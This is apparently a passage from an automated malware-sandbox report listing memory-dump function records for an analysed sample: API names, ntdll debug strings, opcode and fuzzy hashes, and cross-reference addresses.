                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                              • API String ID: 0-929470617
                                                                              • Opcode ID: 15533bc1730ae57ae6598347f349bc98e4eb8e780dd4a6562d848b0fa7db13d2
                                                                              • Instruction ID: 8fb2456fe2be950f0f39cabb37655c096361e4c7bb224296e87b7fc31fc340bb
                                                                              • Opcode Fuzzy Hash: 15533bc1730ae57ae6598347f349bc98e4eb8e780dd4a6562d848b0fa7db13d2
                                                                              • Instruction Fuzzy Hash: 2DE1F4706043028FE726CEA8C894B6EBBE1BB88314F144A2EED65CF2D1D771E945CB51

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              Strings
                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 01559341, 01559366
                                                                              • GsHd, xrefs: 0150D874
                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0155936B
                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01559346
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                              • API String ID: 3446177414-576511823
                                                                              • Opcode ID: cfbbc99567fba258e632fe2389a627959067763a14092ae963ab841753ca31f6
                                                                              • Instruction ID: bfd1423833e453372ad717949ebd794e3bbd9273eca15790279ed18955d7a477
                                                                              • Opcode Fuzzy Hash: cfbbc99567fba258e632fe2389a627959067763a14092ae963ab841753ca31f6
                                                                              • Instruction Fuzzy Hash: 20E18D70604342CBDB65CFD8C490B2ABBF5BF88318F084A2EE9958F291D775E944CB52

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-$0$0
                                                                              • API String ID: 1302938615-699404926
                                                                              • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                              • Instruction ID: 05b699b5cb076ce6c445900c4e8029fe034abe329a64f97bb295f365f99cefd3
                                                                              • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                              • Instruction Fuzzy Hash: CB819270E052499EEF268E6CC8517FEBBB1FFC5320F18465AD851AF292C7349941CB51

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $$@
                                                                              • API String ID: 3446177414-1194432280

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                              • API String ID: 3446177414-56086060

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              • LdrpCheckRedirection, xrefs: 0157488F
                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01574888
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01574899
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 3446177414-3154609507

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                              • API String ID: 3446177414-3526935505

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $
                                                                              • API String ID: 3446177414-3993045852
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                              • String ID:
                                                                              • API String ID: 4281723722-0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-
                                                                              • API String ID: 1302938615-2137968064
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Bl$l
                                                                              • API String ID: 3446177414-208461968
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 01535E34
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorHandling__start
                                                                              • String ID: pow
                                                                              • API String ID: 3213639722-2276729525
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0$Flst
                                                                              • API String ID: 0-758220159
                                                                              APIs
                                                                              • RtlDebugPrintTimes.NTDLL ref: 0151D959
                                                                                • Part of subcall function 014F4859: RtlDebugPrintTimes.NTDLL ref: 014F48F7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $$$
                                                                              • API String ID: 3446177414-233714265
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $
                                                                              • API String ID: 3446177414-3993045852
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: 0$0
                                                                              • API String ID: 3446177414-203156872